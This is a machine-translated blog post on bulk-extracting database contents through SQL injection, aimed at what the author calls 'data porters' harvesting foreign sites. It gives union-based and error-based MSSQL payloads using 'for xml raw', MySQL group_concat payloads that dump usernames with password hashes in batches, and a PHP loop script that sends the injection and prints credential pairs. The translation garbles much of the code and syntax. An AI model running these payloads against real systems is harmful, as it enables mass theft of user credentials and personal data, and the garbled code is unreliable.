Recently, I have been contacted by many data porters in Europe, America, Japan, and South Korea databases. It is very difficult for many target sites to get them. However, what we see is data rather than webshell, webshell only facilitates data migration. So I'm wondering, are you still moving the injection?
1. MSSQL data retrieval:
Most of them are for xml raw, which is supported by MSSQL2000!
Both methods for displaying data in the injection can be used. One is union select, and the other is an explicit error. Take MSSQL2005 as an example:
Select username from members where 1 = 2 union select top 3 username from members for xml raw
Return (if the username is repeated, the duplicate value is automatically removed ):
<Row username = "admin"/> <row username = "Anna"/> <row username = "oldjun"/>
Select username from members where 1 = (select top 3 username from members for xml raw)
Return Value:
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value <row username = "admin"/> <row username = "Anna"/> <row username = "oldjun"/> to data type int.
When there is a large amount of data, no webshell, and injection points can be used, for xml raw is a good way to get batch data! To prevent the returned data from being too large, the top node can be limited to a smaller value, for example, 100. In addition, you must append a script or program to process the returned value.
Ii. obtain data from MYSQL:
Group_concat is widely used. mysql> = 4.1 supports this function. Many people may know it, but most of the articles I have read are used to read table_name or column_name, after all, the data size of table names and column names is small, so it is easy to use. You can read all table names or column names at once. However, group_concat is rarely used to batch inject read data, although it can improve efficiency and increase speed.
Because group_concat has a bottleneck, limit does not work when group_concat is connected to limit (maybe group_concat is executed first), so group_concat reads a lot of data at a time (depending on group_concat_max_len, the default value is 1024 ), in general, the website data volume is large. Once it cannot be used with limit, how can we get the subsequent data?
In fact, you can use group_concat and limit with a simple SQL statement:
Select concat (group_concat (A. username separator 0x7c7c7c), 0x3a, group_concat (A. password separator 0x7c7c7c) from (select * from members limit 0, 3)
Return Value:
Guest | admin | oldjun: 084e0343a0486ff05530df6c705c8bb4 ||||| ad392a36c512176545900fd05772cbc6
So we simply processed the strings and the first three pieces of data came out. To prevent the returned data from being too large, a single query of less than 100 is generally acceptable.
Iii. Some sample code is provided (50 pieces of mysql group_concat data each time ):
<?
If ($ argc <3 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. start end (end: count/50)
Example:
Php. $ argv [0]. 0 9999
Author: oldjun (http://www.oldjun.com)
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Start = $ argv [1];
$ Over = $ argv [2];
For ($ I = $ start; $ I <= $ over; $ I ++ ){
Getdata ($ I );
}
Function getdata ($ I)
{
$ Resp = send ($ I );
If ($ resp ){
Preg_match (# <([^] +) :( [^] +) >>>>>>>>>#, $ resp, $ value );
If ($ value ){
$ Namearr = explode ("|", $ value [1]);
$ Passarr = explode ("|", $ value [2]);
For ($ j = 0; $ j <50; $ j ++ ){
Echo $ namearr [$ j]. "|". $ passarr [$ j]. "";
}
Unset ($ namearr );
Unset ($ passarr );
} Else {
Echo $ resp;
Echo "value error, return $ I ";
Getdata ($ I );
}
}
Else {
Echo "resp error, return $ I ";
Getdata ($ I );
}
}
Function send ($ I)
{
$ Limit = $ I * 50;
// The code for sending data packets is omitted.
// Injection statement example: union select 1, 2, 3, 4, CONCAT (0x3c3c3c3c3c3c3c3c3c, group_concat (. username separator 0x7c7c7c), 0x3a, group_concat (. password separator 0x7c7c7c), 0x3E3E3E3E3E3E3E3E3E3E) FROM (select * from members limit ". $ limit. ", 50) #
}
?>